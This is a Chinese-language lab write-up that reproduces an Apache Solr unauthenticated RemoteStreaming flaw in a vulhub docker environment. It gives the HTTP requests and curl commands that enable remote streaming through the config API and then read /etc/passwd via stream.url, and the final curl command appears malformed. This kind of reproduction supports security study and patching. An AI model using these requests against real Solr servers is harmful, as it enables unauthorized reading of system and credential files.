漏洞简介
Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果.
Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取.
漏洞复现
环境使用kali+docker
(root💀guiltyfet)-[/home/guiltyfet/vulhub/solr/Remote-Streaming-Fileread]
└─# docker-compose up -d
访问网站首页
获取core信息
http://127.0.0.1:8983/solr/admin/cores?indexInfo=false&wt=json
2.http://127.0.0.1:8983/solr/demo/config/
抓包并将请求包修改为POST请求,修改Content-Type为“application/json”,发送以下数据:
POST /solr/demo/config/ HTTP/1.1
Host: 127.0.0.1:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 82
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
It is likely to change in the future可能存在漏洞
3.http://127.0.0.1:8983/solr/demo/debug/dump?param=ContentStreams
抓包
修改请求包及数据如下
POST /solr/demo/debug/dump?param=ContentStreams HTTP/1.1
Host: 127.0.0.1:8983
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
stream.url=file:///etc/passwd
另一种方法
发送如下数据包,修改数据库demo的配置,开启RemoteStreaming:
curl -i -s -k -X $'POST' -H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' $'http://127.0.0.1:8983/solr/demo/config/'
再通过stream.url读取任意文件
不过我的并没有显示
curl -i -s -k 'http://127.0.0.1:8983/solr/demo/debug/dump?param=Content&Streams.url=file:///etc/passwd'